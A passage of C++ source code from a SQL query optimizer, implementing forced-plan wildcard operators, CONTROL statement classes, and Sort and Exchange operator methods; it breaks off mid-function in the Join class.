----------------------------------------------------------------------- // member functions for class ScanForceWildCard // ----------------------------------------------------------------------- ScanForceWildCard::ScanForceWildCard(CollHeap * outHeap) : WildCardOp(REL_FORCE_ANY_SCAN), exposedName_(outHeap), indexName_(outHeap) {initializeScanOptions();} ScanForceWildCard::ScanForceWildCard(const NAString& exposedName, CollHeap *outHeap) : WildCardOp(REL_FORCE_ANY_SCAN,0,NULL,NULL,outHeap), exposedName_(exposedName, outHeap), indexName_(outHeap) {initializeScanOptions();} ScanForceWildCard::ScanForceWildCard(const NAString& exposedName, const NAString& indexName, CollHeap *outHeap) : WildCardOp(REL_FORCE_ANY_SCAN,0,NULL,NULL,outHeap), exposedName_(exposedName, outHeap), indexName_(indexName, outHeap) {initializeScanOptions();} ScanForceWildCard::~ScanForceWildCard() { collHeap()->deallocateMemory((void*)enumAlgorithms_); // delete enumAlgorithms_ from the same heap were the // ScanForceWildCard object belong } //---------------------------------------------------------- // initialize class members //---------------------------------------------------------- void ScanForceWildCard::initializeScanOptions() { mdamStatus_ = UNDEFINED; direction_ = UNDEFINED; indexStatus_ = UNDEFINED; numMdamColumns_ = 0; mdamColumnsStatus_ = UNDEFINED; enumAlgorithms_ = NULL; numberOfBlocksToReadPerAccess_ = -1; } //---------------------------------------------------------- // get the enumeration algorithm (density) for column // if beyound specified columns return COLUMN_SYSTEM //---------------------------------------------------------- ScanForceWildCard::scanOptionEnum ScanForceWildCard::getEnumAlgorithmForColumn(CollIndex column) const { if (column >= numMdamColumns_) return ScanForceWildCard::COLUMN_SYSTEM; else return enumAlgorithms_[column]; } //---------------------------------------------------------- // set the following scan option. return FALSE only if // such option does not exist. //---------------------------------------------------------- NABoolean ScanForceWildCard::setScanOptions(ScanForceWildCard::scanOptionEnum option) { if (option == INDEX_SYSTEM) { indexStatus_ = INDEX_SYSTEM; return TRUE; } else if (option == MDAM_SYSTEM) { mdamStatus_ = MDAM_SYSTEM; return TRUE; } else if (option == MDAM_OFF) { mdamStatus_ = MDAM_OFF; return TRUE; } else if (option == MDAM_FORCED) { mdamStatus_ = MDAM_FORCED; return TRUE; } else if (option == DIRECTION_FORWARD) { direction_ = DIRECTION_FORWARD; return TRUE; } else if (option == DIRECTION_REVERSED) { direction_ = DIRECTION_REVERSED; return TRUE; } else if (option == DIRECTION_SYSTEM) { direction_ = DIRECTION_SYSTEM; return TRUE; } else return FALSE; } NABoolean ScanForceWildCard::setIndexName(const NAString& value) { if (value != "") { indexName_ = value; return TRUE; } else return FALSE; // Error should be nonempty string } //---------------------------------------------------------- // set the columns options based on passed values //---------------------------------------------------------- NABoolean ScanForceWildCard:: setColumnOptions(CollIndex numColumns, ScanForceWildCard::scanOptionEnum* columnAlgorithms, ScanForceWildCard::scanOptionEnum mdamColumnsStatus) { mdamStatus_ = MDAM_FORCED; mdamColumnsStatus_ = mdamColumnsStatus; numMdamColumns_ = numColumns; // delete enumAlgorithms_ from the same heap were the // ScanForceWildCard object belong collHeap()->deallocateMemory((void*)enumAlgorithms_); // allocate enumAlgorithms_[numMdamColumns] in the same heap // were the ScanForceWildCard object belong enumAlgorithms_ = (ScanForceWildCard::scanOptionEnum*) collHeap()->allocateMemory(sizeof(ScanForceWildCard::scanOptionEnum)*numMdamColumns_); for (CollIndex i=0; i<numMdamColumns_; i++) enumAlgorithms_[i] = columnAlgorithms[i]; return TRUE; } //---------------------------------------------------------- // set the columns options based on passed values // here options for particular columns are not passed // and hence COLUMN_SYSTEM is assigned //---------------------------------------------------------- NABoolean ScanForceWildCard:: setColumnOptions(CollIndex numColumns, ScanForceWildCard::scanOptionEnum mdamColumnsStatus) { mdamStatus_ = MDAM_FORCED; mdamColumnsStatus_ = mdamColumnsStatus; numMdamColumns_ = numColumns; // delete enumAlgorithms_ from the same heap were the // ScanForceWildCard object belong collHeap()->deallocateMemory((void*)enumAlgorithms_); // allocate enumAlgorithms_[numMdamColumns] in the same heap // were the ScanForceWildCard object belong enumAlgorithms_ = (ScanForceWildCard::scanOptionEnum*) collHeap()->allocateMemory(sizeof(ScanForceWildCard::scanOptionEnum)*numMdamColumns_); //enumAlgorithms_ = new scanOptionEnum[numMdamColumns_]; for (CollIndex i=0; i<numMdamColumns_; i++) enumAlgorithms_[i] = COLUMN_SYSTEM; return TRUE; } //---------------------------------------------------------- // check if the forced scan options conflict with the Mdam // Master switch status //---------------------------------------------------------- NABoolean ScanForceWildCard::doesThisCoflictMasterSwitch() const { char* globalMdamStatus = getenv("MDAM"); if (globalMdamStatus != NULL) { if (strcmp(globalMdamStatus,"OFF")==0 ) { if ((mdamStatus_ == MDAM_FORCED)||(mdamStatus_ == MDAM_SYSTEM)) return TRUE; } } return FALSE; } //---------------------------------------------------------- // merge with another ScanForceWildCard object. // return FALSE if a conflict between the options of // the two objects exists. //---------------------------------------------------------- NABoolean ScanForceWildCard::mergeScanOptions(const ScanForceWildCard &other) { if ((other.exposedName_ != "") &&(other.exposedName_ != exposedName_)) { if (exposedName_ == "") { exposedName_ = other.exposedName_; } else return FALSE; // conflict } if ((other.indexName_ != "") &&(other.indexName_ != indexName_)) { if (indexName_ == "") { indexName_ = other.indexName_; } else return FALSE; // conflict } if (other.indexStatus_ == INDEX_SYSTEM) { indexStatus_ = INDEX_SYSTEM; } if (indexStatus_ == INDEX_SYSTEM) { if (indexName_ != "") return FALSE; // conflict } if ((other.mdamStatus_ == MDAM_OFF) &&(mdamStatus_ != MDAM_OFF)) { if (mdamStatus_ == UNDEFINED) { mdamStatus_ = other.mdamStatus_; } else return FALSE; // conflict } if ((other.mdamStatus_ == MDAM_SYSTEM) &&(mdamStatus_ != MDAM_SYSTEM)) { if (mdamStatus_ == UNDEFINED) { mdamStatus_ = other.mdamStatus_; } else return FALSE; // conflict } if ((other.mdamStatus_ == MDAM_FORCED) &&(mdamStatus_ != MDAM_FORCED)) { if (mdamStatus_ == UNDEFINED) { mdamStatus_ = other.mdamStatus_; } else return FALSE; // conflict } if (other.numMdamColumns_ > 0) { if ((mdamStatus_ == UNDEFINED)||(mdamStatus_ == MDAM_FORCED)) { if (numMdamColumns_ == other.numMdamColumns_) { for (CollIndex i=0; i<numMdamColumns_; i++) { if (enumAlgorithms_[i] != other.enumAlgorithms_[i]) return FALSE; // conflict } if (other.mdamColumnsStatus_ != mdamColumnsStatus_) return FALSE; // conflict } else if (numMdamColumns_ == 0) // i.e. enumAlgorithm is NULL { numMdamColumns_ = other.numMdamColumns_; collHeap()->deallocateMemory((void*)enumAlgorithms_); //delete enumAlgorithms_; enumAlgorithms_ = (ScanForceWildCard::scanOptionEnum*) collHeap()->allocateMemory(sizeof(ScanForceWildCard::scanOptionEnum)*numMdamColumns_); //enumAlgorithms_ = new scanOptionEnum[numMdamColumns_]; for (CollIndex i=0; i<numMdamColumns_; i++) { enumAlgorithms_[i] = other.enumAlgorithms_[i]; } } else return FALSE; // coflict } else return FALSE; // conflict } if (other.mdamColumnsStatus_ != UNDEFINED) { if (mdamColumnsStatus_ == UNDEFINED) { mdamColumnsStatus_ = other.mdamColumnsStatus_; } if (mdamColumnsStatus_ != other.mdamColumnsStatus_) { return FALSE; // conflict } } if ((other.direction_ == DIRECTION_FORWARD) &&(direction_ != DIRECTION_FORWARD)) { if (direction_ == UNDEFINED) { direction_ = other.direction_; } else return FALSE; // conflict } if ((other.direction_ == DIRECTION_REVERSED) &&(direction_ != DIRECTION_REVERSED)) { if (direction_ == UNDEFINED) { direction_ = other.direction_; } else return FALSE; // conflict } if ((other.direction_ == DIRECTION_SYSTEM) &&(direction_ != DIRECTION_SYSTEM)) { if (direction_ == UNDEFINED) { direction_ = other.direction_; } else return FALSE; // conflict } if (other.numberOfBlocksToReadPerAccess_ > 0) { numberOfBlocksToReadPerAccess_ = other.numberOfBlocksToReadPerAccess_; } return TRUE; } //---------------------------------------------------------- // if access path is not given then the default is ANY i.e // system choice unless MDAM is forced then the default is // the base table. //---------------------------------------------------------- void ScanForceWildCard::prepare() { if (mdamStatus_ != ScanForceWildCard::MDAM_FORCED) { if (indexName_ == "") { indexStatus_ = ScanForceWildCard::INDEX_SYSTEM; } } else // mdam is forced { if ((indexName_ == "") && (indexStatus_ != ScanForceWildCard::INDEX_SYSTEM)) { indexName_ = exposedName_; } } if (mdamColumnsStatus_ == ScanForceWildCard::UNDEFINED) { mdamColumnsStatus_ = ScanForceWildCard::MDAM_COLUMNS_REST_BY_SYSTEM; } return; } RelExpr * ScanForceWildCard::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { ScanForceWildCard *temp; if (derivedNode != NULL) ABORT("No support for classes derived from ScanForceWildcard"); temp = new (outHeap) ScanForceWildCard(exposedName_,indexName_,outHeap); temp->direction_ = direction_; temp->indexStatus_ = indexStatus_; temp->mdamStatus_ = mdamStatus_; temp->mdamColumnsStatus_ = mdamColumnsStatus_; temp->numMdamColumns_ = numMdamColumns_; temp->numberOfBlocksToReadPerAccess_ = numberOfBlocksToReadPerAccess_; temp->enumAlgorithms_ = new (outHeap) scanOptionEnum[numMdamColumns_]; for (CollIndex i=0; i<numMdamColumns_; i++) { temp->enumAlgorithms_[i]=enumAlgorithms_[i]; } RelExpr *result = temp; WildCardOp::copyTopNode(result,outHeap); return result; } const NAString ScanForceWildCard::getText() const { NAString result("forced scan", CmpCommon::statementHeap()); if (exposedName_ != "") { result += "("; result += exposedName_; if (indexName_ != "") { result += ", index "; result += indexName_; } result += ")"; } return result; } // ----------------------------------------------------------------------- // member functions for class JoinForceWildCard // ----------------------------------------------------------------------- JoinForceWildCard::JoinForceWildCard(OperatorTypeEnum type, RelExpr *child0, RelExpr *child1, forcedPlanEnum plan, Int32 numOfEsps, CollHeap *outHeap) : WildCardOp(type, 0, child0, child1,outHeap) { plan_ = plan; numOfEsps_ = numOfEsps; } JoinForceWildCard::~JoinForceWildCard() {} RelExpr * JoinForceWildCard::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode != NULL) ABORT("No support for classes derived from JoinForceWildcard"); result = new(outHeap) JoinForceWildCard(getOperatorType(), NULL, NULL, plan_, numOfEsps_, outHeap); WildCardOp::copyTopNode(result,outHeap); return result; } const NAString JoinForceWildCard::getText() const { NAString result("forced", CmpCommon::statementHeap()); if (plan_ == FORCED_PLAN0) result += " plan0"; else if (plan_ == FORCED_PLAN1) result += " plan1"; else if (plan_ == FORCED_PLAN2) result += " plan2"; else if (plan_ == FORCED_TYPE1) result += " type1"; else if (plan_ == FORCED_TYPE2) result += " type2"; else if (plan_ == FORCED_INDEXJOIN) result += " indexjoin"; switch (getOperatorType()) { case REL_FORCE_NESTED_JOIN: result += " nested join"; break; case REL_FORCE_MERGE_JOIN: result += " merge join"; break; case REL_FORCE_HASH_JOIN: result += " hash join"; break; case REL_FORCE_HYBRID_HASH_JOIN: result += " hybrid hash join"; break; case REL_FORCE_ORDERED_HASH_JOIN: result += " ordered hash join"; break; default: result += " join"; break; } return result; } // ----------------------------------------------------------------------- // member functions for class ExchangeForceWildCard // ----------------------------------------------------------------------- ExchangeForceWildCard::ExchangeForceWildCard(RelExpr *child0, forcedExchEnum which, forcedLogPartEnum whatLogPart, Lng32 numBottomEsps, CollHeap *outHeap) : WildCardOp(REL_FORCE_EXCHANGE, 0, child0, NULL, outHeap), which_(which), whatLogPart_(whatLogPart), howMany_(numBottomEsps) { } ExchangeForceWildCard::~ExchangeForceWildCard() {} RelExpr * ExchangeForceWildCard::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelExpr *result; if (derivedNode != NULL) ABORT("No support for classes derived from ExchangeForceWildcard"); result = new(outHeap) ExchangeForceWildCard(NULL, which_, whatLogPart_, howMany_, outHeap); WildCardOp::copyTopNode(result,outHeap); return result; } const NAString ExchangeForceWildCard::getText() const { NAString result("forced",CmpCommon::statementHeap()); if (which_ == FORCED_PA) result += " PA"; else if (which_ == FORCED_PAPA) result += " PAPA"; else if (which_ == FORCED_ESP_EXCHANGE) result += " ESP"; result += " exchange"; return result; } // ----------------------------------------------------------------------- // member functions for class UDFForceWildCard // ----------------------------------------------------------------------- UDFForceWildCard::UDFForceWildCard(OperatorTypeEnum op, CollHeap *outHeap) : WildCardOp(op, 0, NULL, NULL, outHeap), functionName_(outHeap), actionName_(outHeap) {} UDFForceWildCard::UDFForceWildCard(const NAString& functionName, const NAString& actionName, CollHeap *outHeap) : WildCardOp(REL_FORCE_ANY_SCALAR_UDF, 0, NULL, NULL, outHeap), functionName_(functionName, outHeap), actionName_(actionName, outHeap) {} UDFForceWildCard::~UDFForceWildCard() { } //---------------------------------------------------------- // merge with another UDFForceWildCard object. // return FALSE if a conflict between the options of // the two objects exists. //---------------------------------------------------------- NABoolean UDFForceWildCard::mergeUDFOptions(const UDFForceWildCard &other) { if ((other.functionName_ != "") &&(other.functionName_ != functionName_)) { if (functionName_ == "") { functionName_ = other.functionName_; } else return FALSE; // conflict } if ((other.actionName_ != "") &&(other.actionName_ != actionName_)) { if (actionName_ == "") { actionName_ = other.actionName_; } else return FALSE; // conflict } return TRUE; } RelExpr * UDFForceWildCard::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { UDFForceWildCard *temp; if (derivedNode != NULL) ABORT("No support for classes derived from UDFForceWildCard"); temp = new (outHeap) UDFForceWildCard(functionName_,actionName_,outHeap); RelExpr *result = temp; WildCardOp::copyTopNode(result,outHeap); return result; } const NAString UDFForceWildCard::getText() const { NAString result("forced UDF", CmpCommon::statementHeap()); if (functionName_ != "") { result += "("; result += functionName_; if (actionName_ != "") { result += ", "; result += actionName_; } result += ")"; } return result; } // ----------------------------------------------------------------------- // member functions for Control* base class // ----------------------------------------------------------------------- ControlAbstractClass::~ControlAbstractClass() {} NABoolean ControlAbstractClass::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; ControlAbstractClass &o = (ControlAbstractClass &) other; // We do NOT need to compare sqlText's here return (token_ == o.token_ AND value_ == o.value_ AND dynamic_ == o.dynamic_ AND reset_ == o.reset_); } RelExpr *ControlAbstractClass::copyTopNode(RelExpr *derivedNode, CollHeap *h) { CMPASSERT(derivedNode); ((ControlAbstractClass *)derivedNode)->reset_ = reset_; return derivedNode; } NABoolean ControlAbstractClass::alterArkcmpEnvNow() const { return NOT (dynamic() || CmpCommon::context()->GetMode() == STMT_DYNAMIC); } StaticOnly ControlAbstractClass::isAStaticOnlyStatement() const { if (dynamic_) return NOT_STATIC_ONLY; return (getOperatorType() == REL_CONTROL_QUERY_DEFAULT) ? STATIC_ONLY_WITH_WORK_FOR_PREPROCESSOR : STATIC_ONLY_VANILLA; } static void removeLeadingSpace(NAString &sqlText) { if (!sqlText.isNull() && isspace((unsigned char)sqlText[size_t(0)])) sqlText.remove(0, 1); // For VS2003 } static NABoolean beginsWithKeyword(NAString &sqlText, const char *kwd, NABoolean thenRemoveIt = TRUE) { // Assumes Prettify has been called, so only one space (at most) btw tokens. // If this is called more than once, the second time in the text might begin // with a delimiting space. removeLeadingSpace(sqlText); size_t len = strlen(kwd) + 1; // +1 for delimiter (space) if (sqlText.length() > len) { NAString tmp(sqlText,CmpCommon::statementHeap()); tmp.remove(len); char c = tmp[--len]; // delimiter if (!isalnum(c) && c != '_') { tmp.remove(len); // remove the delimiter 'c' from tmp if (tmp == kwd) { if (thenRemoveIt) sqlText.remove(0, len); // leave delimiter, now at beginning return TRUE; } } } return FALSE; } // Convert "PROCEDURE xyz () CONTROL..." to just the "CONTROL..." part. // Convert a dynamic stmt's text of "SET SCHEMA 'x.y';" // into the static "CONTROL QUERY DEFAULT SCHEMA 'x.y';" // for its round-trip to executor and back here as a SQLTEXT_STATIC_COMPILE. void ControlAbstractClass::rewriteControlText( NAString &sqlText, CharInfo::CharSet sqlTextCharSet, ControlAbstractClass *ctrl) { PrettifySqlText(sqlText); // trim, upcase where okay, cvt tabs to spaces if (beginsWithKeyword(sqlText, "PROCEDURE")) { size_t rp = sqlText.index(')'); CMPASSERT(rp != NA_NPOS); sqlText.remove(0, ++rp); removeLeadingSpace(sqlText); } // if SHOWSHAPE or SHOWPLAN, remove them from the beginning. // beginsWithKeyword will remove the keyword, if found. if ((beginsWithKeyword(sqlText, "SHOWSHAPE")) || (beginsWithKeyword(sqlText, "SHOWPLAN"))) { removeLeadingSpace(sqlText); } if (ctrl->dynamic()) { if ((beginsWithKeyword(sqlText, "SET")) && (ctrl->getOperatorType() != REL_SET_SESSION_DEFAULT)) sqlText.prepend(getControlTextPrefix(ctrl)); } else { if (beginsWithKeyword(sqlText, "DECLARE")) sqlText.prepend(getControlTextPrefix(ctrl)); } //## We'll have to fix SqlParser.y, I think, if this stmt appears in //## a compound stmt (IF ... THEN SET SCHEMA 'x' ... ELSE SET SCHEMA 'y' ...) if (ctrl->getOperatorType() != REL_SET_SESSION_DEFAULT) { if ((NOT beginsWithKeyword(sqlText, "CONTROL", FALSE)) && (NOT beginsWithKeyword(sqlText, "CQD", FALSE))) CMPASSERT(0); } } NAString ControlAbstractClass::getControlTextPrefix( const ControlAbstractClass *ctrl) { switch (ctrl->getOperatorType()) { case REL_CONTROL_QUERY_SHAPE: return "CONTROL QUERY SHAPE"; case REL_CONTROL_QUERY_DEFAULT: return "CONTROL QUERY DEFAULT"; case REL_CONTROL_TABLE: return "CONTROL TABLE"; case REL_CONTROL_SESSION: return "CONTROL SESSION"; case REL_SET_SESSION_DEFAULT: return "SET SESSION DEFAULT"; default: return "CONTROL ??"; } } // ----------------------------------------------------------------------- // member functions for class ControlQueryShape // ----------------------------------------------------------------------- RelExpr * ControlQueryShape::copyTopNode(RelExpr *derivedNode, CollHeap *h) { ControlQueryShape *result; if (derivedNode == NULL) result = new (h) ControlQueryShape(NULL, getSqlText(), getSqlTextCharSet(), holdShape_, dynamic_, ignoreExchange_, ignoreSort_, h); else result = (ControlQueryShape *) derivedNode; return ControlAbstractClass::copyTopNode(result,h); } const NAString ControlQueryShape::getText() const { NAString result(getControlTextPrefix(this)); if (ignoreExchange_) { if (ignoreSort_) result += " WITHOUT ENFORCERS"; else result += " WITHOUT EXCHANGE"; } else if (ignoreSort_) result += " WITHOUT SORT"; return result; } // ----------------------------------------------------------------------- // member functions for class ControlQueryDefault // ----------------------------------------------------------------------- ControlQueryDefault::ControlQueryDefault( const NAString &sqlText, CharInfo::CharSet sqlTextCharSet, const NAString &token, const NAString &value, NABoolean dyn, Lng32 holdOrRestoreCQD, CollHeap *h, Int32 reset): ControlAbstractClass(REL_CONTROL_QUERY_DEFAULT, sqlText, sqlTextCharSet, token, value, dyn, h, reset), holdOrRestoreCQD_(holdOrRestoreCQD), attrEnum_(__INVALID_DEFAULT_ATTRIBUTE) {} RelExpr * ControlQueryDefault::copyTopNode(RelExpr *derivedNode, CollHeap *h) { RelExpr *result; if (derivedNode == NULL) { result = new (h) ControlQueryDefault(sqlText_, sqlTextCharSet_, token_, value_, dynamic_, holdOrRestoreCQD_, h); ((ControlQueryDefault *)result)->attrEnum_ = attrEnum_; } else result = derivedNode; return ControlAbstractClass::copyTopNode(result,h); } const NAString ControlQueryDefault::getText() const { return getControlTextPrefix(this); } // ----------------------------------------------------------------------- // member functions for class ControlTable // ----------------------------------------------------------------------- ControlTable::ControlTable( CorrName *tableName, const NAString &sqlText, CharInfo::CharSet sqlTextCharSet, const NAString &token, const NAString &value, NABoolean dyn, CollHeap *h): ControlAbstractClass(REL_CONTROL_TABLE, sqlText, sqlTextCharSet, token, value, dyn, h), tableName_(tableName) {} RelExpr * ControlTable::copyTopNode(RelExpr *derivedNode, CollHeap *h) { RelExpr *result; if (derivedNode == NULL) result = new (h) ControlTable(tableName_, sqlText_, sqlTextCharSet_, token_, value_, dynamic_, h); else result = derivedNode; return ControlAbstractClass::copyTopNode(result,h); } const NAString ControlTable::getText() const { return getControlTextPrefix(this); } // ----------------------------------------------------------------------- // member functions for class ControlSession // ----------------------------------------------------------------------- ControlSession::ControlSession( const NAString &sqlText, CharInfo::CharSet sqlTextCharSet, const NAString &token, const NAString &value, NABoolean dyn, CollHeap *h): ControlAbstractClass(REL_CONTROL_SESSION, sqlText, sqlTextCharSet, token, value, dyn, h) {} RelExpr * ControlSession::copyTopNode(RelExpr *derivedNode, CollHeap *h) { RelExpr *result; if (derivedNode == NULL) result = new (h) ControlSession(sqlText_, sqlTextCharSet_, token_, value_, dynamic_, h); else result = derivedNode; return ControlAbstractClass::copyTopNode(result,h); } const NAString ControlSession::getText() const { return getControlTextPrefix(this); } // ----------------------------------------------------------------------- // member functions for class SetSessionDefault // ----------------------------------------------------------------------- SetSessionDefault::SetSessionDefault( const NAString &sqlText, CharInfo::CharSet sqlTextCharSet, const NAString &token, const NAString &value, CollHeap *h): ControlAbstractClass(REL_SET_SESSION_DEFAULT, sqlText, sqlTextCharSet, token, value, TRUE, h) {} RelExpr * SetSessionDefault::copyTopNode(RelExpr *derivedNode, CollHeap *h) { RelExpr *result; if (derivedNode == NULL) result = new (h) SetSessionDefault(sqlText_, sqlTextCharSet_, token_, value_, h); else result = derivedNode; return ControlAbstractClass::copyTopNode(result,h); } const NAString SetSessionDefault::getText() const { return getControlTextPrefix(this); } // ----------------------------------------------------------------------- // member functions for class OSIMControl // ----------------------------------------------------------------------- OSIMControl::OSIMControl(OptimizerSimulator::osimMode mode, NAString & localDir, NABoolean force, CollHeap * oHeap) //the real work is done in OSIMControl::bindNode() to control OSIM. //We set operator type to REL_SET_SESSION_DEFAULT, //so as not to define dummy OSIMControl::codeGen() and OSIMControl::work(), //which will do nothing there, : ControlAbstractClass(REL_SET_SESSION_DEFAULT, NAString("DUMMYSQLTEXT", oHeap), CharInfo::ISO88591, NAString("OSIM", oHeap), NAString("DUMMYVALUE", oHeap), TRUE, oHeap) , targetMode_(mode), osimLocalDir_(localDir, oHeap), forceLoad_(force) {} RelExpr * OSIMControl::copyTopNode(RelExpr *derivedNode, CollHeap *h ) { RelExpr *result; if (derivedNode == NULL) result = new (h) OSIMControl(targetMode_, osimLocalDir_, forceLoad_, h); else result = derivedNode; return ControlAbstractClass::copyTopNode(result,h); } // ----------------------------------------------------------------------- // member functions for class Sort // ----------------------------------------------------------------------- Sort::~Sort() { } Int32 Sort::getArity() const { return 1;} HashValue Sort::topHash() { HashValue result = RelExpr::topHash(); result ^= sortKey_; result ^= arrangedCols_; return result; } NABoolean Sort::duplicateMatch(const RelExpr & other) const { if (NOT RelExpr::duplicateMatch(other)) return FALSE; Sort &o = (Sort &) other; if (NOT (sortKey_ == o.sortKey_) OR NOT(arrangedCols_ == o.arrangedCols_)) return FALSE; return TRUE; } RelExpr * Sort::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Sort *result; if (derivedNode == NULL) result = new (outHeap) Sort(NULL, sortKey_, outHeap); else result = (Sort *) derivedNode; // copy arranged columns result->arrangedCols_ = arrangedCols_; return RelExpr::copyTopNode(result, outHeap); } NABoolean Sort::isLogical() const { return FALSE; } NABoolean Sort::isPhysical() const { return TRUE; } const NAString Sort::getText() const { return "sort"; } PlanPriority Sort::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { const PhysicalProperty* spp = context->getPlan()->getPhysicalProperty(); Lng32 degreeOfParallelism = spp->getCountOfPartitions(); double val = 1; if (degreeOfParallelism <= 1) { // serial plans are risky. exact an insurance premium from serial plans. val = CURRSTMT_OPTDEFAULTS->riskPremiumSerial(); } CostScalar premium(val); PlanPriority result(0, 0, premium); if (QueryAnalysis::Instance() AND QueryAnalysis::Instance()->optimizeForFirstNRows()) result.incrementLevels(SORT_FIRST_N_PRIORITY,0); // For the option of Max Degree of Parallelism we can either use the // value set in comp_int_9 (if positive) or we use the number of CPUs // if the CQD is set to -1, or feature is disabled if CQD is 0 (default). Lng32 maxDegree = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9); if (CURRSTMT_OPTDEFAULTS->maxParallelismIsFeasible() OR ( maxDegree == -1) ) { // if CQD is set to -1 this mean use the number of CPUs maxDegree = spp->getCurrentCountOfCPUs(); } if (maxDegree > 1) // CQD set to 0 means feature is OFF { if (degreeOfParallelism < maxDegree) result.incrementLevels(0,-10); // need to replace with constant } return result; } void Sort::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (sortKey_.entries() > 0) { xlist.insert(sortKey_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("sort_key"); } if (PartialSortKeyFromChild_.entries() > 0) { xlist.insert(PartialSortKeyFromChild_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("PartialSort_FromChild"); } // if (NOT arrangedCols_.isEmpty()) // { // xlist.insert(arrangedCols_.rebuildExprTree(ITM_ITEM_LIST)); // llist.insert("arranged_cols"); // } RelExpr::addLocalExpr(xlist,llist); } void Sort::needSortedNRows(NABoolean val) { sortNRows_ = val; // Sort changes a GET_N to GET_ALL, so it does not propagate a // Get_N request. It can simply act on one. } // ----------------------------------------------------------------------- // member functions for class SortFromTop // ----------------------------------------------------------------------- RelExpr * SortFromTop::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { SortFromTop *result; if (derivedNode == NULL) result = new (outHeap) SortFromTop(NULL, outHeap); else result = (SortFromTop *) derivedNode; result->getSortRecExpr() = getSortRecExpr(); return Sort::copyTopNode(result, outHeap); } const NAString SortFromTop::getText() const { return "sort_from_top"; } // ----------------------------------------------------------------------- // member functions for class Exchange // ----------------------------------------------------------------------- Exchange::~Exchange() { } Int32 Exchange::getArity() const { return 1;} RelExpr * Exchange::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Exchange *result; if (derivedNode == NULL) { result = new (outHeap) Exchange(NULL, outHeap); } else result = (Exchange *) derivedNode; result->upMessageBufferLength_=upMessageBufferLength_; result->downMessageBufferLength_=downMessageBufferLength_; result->hash2RepartitioningWithSameKey_ = hash2RepartitioningWithSameKey_; if (halloweenSortIsMyChild_) result->markHalloweenSortIsMyChild(); return RelExpr::copyTopNode(result, outHeap); } NABoolean Exchange::isLogical() const { return FALSE; } NABoolean Exchange::isPhysical() const { return TRUE; } NABoolean Exchange::isAPA() const { if (NOT isDP2Exchange() OR bottomPartFunc_ == NULL) return FALSE; const LogPhysPartitioningFunction *lpf = bottomPartFunc_-> castToLogPhysPartitioningFunction(); return (lpf == NULL OR NOT lpf->getUsePapa()); } NABoolean Exchange::isAPAPA() const { return (isDP2Exchange() AND bottomPartFunc_ AND NOT isAPA()); } const NAString Exchange::getText() const { NAString result("exchange",CmpCommon::statementHeap()); if (isAPA()) result = "pa_exchange"; else if (isAPAPA()) result = "split_top"; else if (isAnESPAccess()) result = "esp_access"; else if (isEspExchange()) result = "esp_exchange"; const PartitioningFunction *topPartFunc = getTopPartitioningFunction(); const PartitioningFunction *bottomPartFunc = getBottomPartitioningFunction(); Lng32 topNumParts = ANY_NUMBER_OF_PARTITIONS; Lng32 bottomNumParts = ANY_NUMBER_OF_PARTITIONS; if (topPartFunc) topNumParts = topPartFunc->getCountOfPartitions(); if (bottomPartFunc) bottomNumParts = bottomPartFunc->getCountOfPartitions(); if (topNumParts != ANY_NUMBER_OF_PARTITIONS OR bottomNumParts != ANY_NUMBER_OF_PARTITIONS) { char str[TEXT_DISPLAY_LENGTH]; sprintf(str," %d:%d",topNumParts,bottomNumParts); result += str; } if (bottomPartFunc AND isDP2Exchange()) { const LogPhysPartitioningFunction *lpf = bottomPartFunc->castToLogPhysPartitioningFunction(); if (lpf) { if (lpf->getUsePapa()) { char str[TEXT_DISPLAY_LENGTH]; sprintf(str," with %d PA(s)",lpf->getNumOfClients()); result += str; } switch (lpf->getLogPartType()) { case LogPhysPartitioningFunction::LOGICAL_SUBPARTITIONING: result += ", log. subpart."; break; case LogPhysPartitioningFunction::HORIZONTAL_PARTITION_SLICING: result += ", slicing"; break; case LogPhysPartitioningFunction::PA_GROUPED_REPARTITIONING: result += ", repartitioned"; break; default: break; } } } return result; } PlanPriority Exchange::computeOperatorPriority (const Context* context, PlanWorkSpace *pws, Lng32 planNumber) { PlanPriority result; OperatorTypeEnum parOperType = context->getCurrentAncestor()->getPlan()-> getPhysicalExpr()->getOperatorType(); Lng32 cqdValue = ActiveSchemaDB()->getDefaults().getAsLong(COMP_INT_9); if ((cqdValue == -2) AND ((parOperType == REL_ROOT) OR (parOperType == REL_FIRST_N))) result.incrementLevels(10,0); return result; } void Exchange::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { const PartitioningFunction *topPartFunc = getTopPartitioningFunction(); if (topPartFunc AND topPartFunc->getCountOfPartitions() > 1 AND topPartFunc->getPartitioningExpression()) { xlist.insert(topPartFunc->getPartitioningExpression()); llist.insert("partitioning_expression"); } if (NOT sortKeyForMyOutput_.isEmpty()) { xlist.insert(sortKeyForMyOutput_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("merged_order"); } RelExpr::addLocalExpr(xlist,llist); } // ----------------------------------------------------------------------- // member functions for class Join // ----------------------------------------------------------------------- Int32 Join::getArity() const { return 2;} // helper function used in // HashJoinRule::topMatch() and // JoinToTSJRule::topMatch() // to make sure that only one of them is turned off. // Otherwise, error 2235 "pass one skipped, but cannot produce a plan // in pass two, originated from file ../optimizer/opt.cpp" NABoolean Join::allowHashJoin() { // HJ is only implementation for full outer join NABoolean fullOuterJoin = (CmpCommon::getDefault(COMP_BOOL_196) != DF_ON) AND isFullOuterJoin(); if (fullOuterJoin) return TRUE; // HJ is only join implementation allowed when avoiding halloween update if (avoidHalloweenR2()) return TRUE; // favor NJ when only one row from outer for sure Cardinality minrows, outerLimit; GroupAttributes *oGrpAttr = child(0).getGroupAttr(); NABoolean hasConstraint = oGrpAttr->hasCardConstraint(minrows, outerLimit); // outerLimit was set to INFINITE_CARDINALITY if no constraint CostScalar outerRows(outerLimit); // if it has no 